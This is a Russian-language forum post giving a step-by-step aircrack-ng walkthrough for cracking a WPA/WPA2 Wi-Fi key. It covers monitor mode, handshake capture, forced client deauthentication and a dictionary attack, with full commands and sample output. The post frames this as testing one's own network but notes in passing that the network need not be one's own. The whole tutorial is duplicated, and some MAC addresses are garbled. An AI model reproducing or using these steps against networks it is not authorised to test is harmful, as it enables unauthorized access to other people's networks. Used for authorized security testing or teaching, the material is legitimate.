- 24, Mar 2014
- #1
D этой статье мы попробуем "проверить на безопасность" свою собственную беспроводную точку (Можно не свою)доступа в интернет. И так, приступим...
Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга
Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга.
Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте. Точная процедура включения режима монитора отличается в зависимости от используемого драйвера.
Для определения драйвера, выполните следующую команду: airmon-ng
На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:
Interface Chipset Driver
rausb0 Ralink RT73 rt73
wlan0 Broadcom b43 - [phy0]
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
Шаг 1а - Настройка MadWifi -NG
Сперва остановим ath0, выполнив:
airmon-ng stop ath0 Должно быть так: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено.
Это должно выглядеть примерно так: lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга: airmon-ng start wifi0 9
После этой команды мы должны увидеть что-то похожее на:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig
Ответ должен выглядеть так:
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retryff RTS thrff Fragment thrff Encryption keyff Power Managementff Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Шаг 1b - Настройка драйверов mac80211 airmon-ng start wlan0 9
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
Обратите внимание, что монитор включен на mon0.
Стадия 1С — Настройка прочих драйверов
Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):
airmon-ng start rausb0 9 Результат Interface Chipset Driver rausb0 Ralink rt73 (monitor mode enabled) Шаг 2 — Начало. Сбор хэндшейков. Целью этого шага является сбор т. н. рукопожатий Выполняем: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 Где: · -с 9 является каналом для беспроводной сети · - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.
· -w psk является префиксом имени файла вывода
· ath0 является именем нашего интерфейса.
Вот какой будет вывод если беспроводной клиент подключится к сети:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F5:FD:FB:C2 35 0 116
А вот так если не подключится:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа.
Но думаю это не проблема. На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен.
Нам понадобится его MAC-адрес. Откройте другой сеанс консоли и введите: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F
5:FD:FB:C2 ath0 Где: · -0 средство деаутентификации · 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите) · -a 00:14:6C:7E:40:80 МАС-адрес точки доступа · -c 00:0F5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили · ath0 имя интерфейса Вот как будет выглядеть результат команды: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F5:34:30:30]
Шаг 4 — Aircrack-ng - взлом предварительного ключа
На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.
Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.
Откройте другой сеанс консоли и введите:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Где:
-w password.lst это имя файла словаря
*.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.
Вот типичный вывод, когда нет хэндшейков:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.
Вот таким может быть вывод если хэндшейк будет найден:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ.
В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.
Вот таким будет вывод при успешном взломе:
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Ну вот, ключ у нас.
Беспроводная сеть проверена на безопасность
Шаг 1 - запуск беспроводного интерфейса в режиме мониторинга
Цель этого шага в том, чтобы запустить вашу wi-fi карту в так называемом режиме мониторинга.
Данный режим позволяет вам «слушать» все пакеты, т. е. Не только те которые адресованы вашей карте. Точная процедура включения режима монитора отличается в зависимости от используемого драйвера.
Для определения драйвера, выполните следующую команду: airmon-ng
На машине с Ralink, Atheros и Broadcom система выдаст примерно следующее:
Interface Chipset Driver
rausb0 Ralink RT73 rt73
wlan0 Broadcom b43 - [phy0]
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
Шаг 1а - Настройка MadWifi -NG
Сперва остановим ath0, выполнив:
airmon-ng stop ath0 Должно быть так: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed) Выполните команду "iwconfig", чтобы убедиться в том, что больше никаких интерфейсов athX не запущено.
Это должно выглядеть примерно так: lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. Теперь введите следующую команду, чтобы переключить беспроводную карту на канал 9 в режиме мониторинга: airmon-ng start wifi0 9
После этой команды мы должны увидеть что-то похожее на:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
Теперь убедимся что наш интерфейс правильно настроен, снова выполняем команду iwconfig
Ответ должен выглядеть так:
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retryff RTS thrff Fragment thrff Encryption keyff Power Managementff Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Шаг 1b - Настройка драйверов mac80211 airmon-ng start wlan0 9
Interface Chipset Driver
wlan0 Broadcom b43 - [phy0]
(monitor mode enabled on mon0)
Обратите внимание, что монитор включен на mon0.
Стадия 1С — Настройка прочих драйверов
Для других ( ieee80211 основе ) драйверов, просто выполните следующую команду, чтобы включить режим мониторинга (замените rausb0 вашим именем интерфейса):
airmon-ng start rausb0 9 Результат Interface Chipset Driver rausb0 Ralink rt73 (monitor mode enabled) Шаг 2 — Начало. Сбор хэндшейков. Целью этого шага является сбор т. н. рукопожатий Выполняем: airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0 Где: · -с 9 является каналом для беспроводной сети · - BSSID 00:14:6 C: 7E : 40:80 является MAC адресом точки доступа.
· -w psk является префиксом имени файла вывода
· ath0 является именем нашего интерфейса.
Вот какой будет вывод если беспроводной клиент подключится к сети:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F5:FD:FB:C2 35 0 116
А вот так если не подключится:
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
Данный шаг может затянуться, и вам придется ждать пока кто-то из клиентов не подключится к точке доступа.
Но думаю это не проблема. На основании вывода Airodump-ng в предыдущем шаге, вам удалось определить клиента, который в данный момент подключен.
Нам понадобится его MAC-адрес. Откройте другой сеанс консоли и введите: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F
5:FD:FB:C2 ath0 Где: · -0 средство деаутентификации · 1 число деаутентификаций для отправки ( вы можете отправить несколько , если хотите) · -a 00:14:6C:7E:40:80 МАС-адрес точки доступа · -c 00:0F5:FD:FB:C2 МАС-адрес клиента которого мы обнаружили · ath0 имя интерфейса Вот как будет выглядеть результат команды: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F5:34:30:30]
Шаг 4 — Aircrack-ng - взлом предварительного ключа
На данном этапе нам нужно взломать предварительный ключ WPA/WPA2. Чтобы сделать это, нам понадобиться словарь слов в качестве входных данных.
Существует небольшой словарь, который поставляется с aircrack-ng - “password.lst”. Будем использовать его.
Откройте другой сеанс консоли и введите:
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
Где:
-w password.lst это имя файла словаря
*.cap название группы файлов, содержащих перехваченные пакеты . Обратите внимание, что в данном случае мы использовали специальный символ *, чтобы включить несколько файлов.
Вот типичный вывод, когда нет хэндшейков:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.
Когда это происходит, вы должны либо повторить шаг 3 или ждать дольше, если вы используете пассивный подход.
Вот таким может быть вывод если хэндшейк будет найден:
Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.
# BSSID ESSID Encryption
1 00:14:6C:7E:40:80 teddy WPA (1 handshake)
Choosing first network as target.
Теперь в этот момент, Aircrack-ng начнет пытаться взломать предварительный ключ.
В зависимости от скорости вашего процессора и размера словаря, это может занять много времени.
Вот таким будет вывод при успешном взломе:
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
Ну вот, ключ у нас.
Беспроводная сеть проверена на безопасность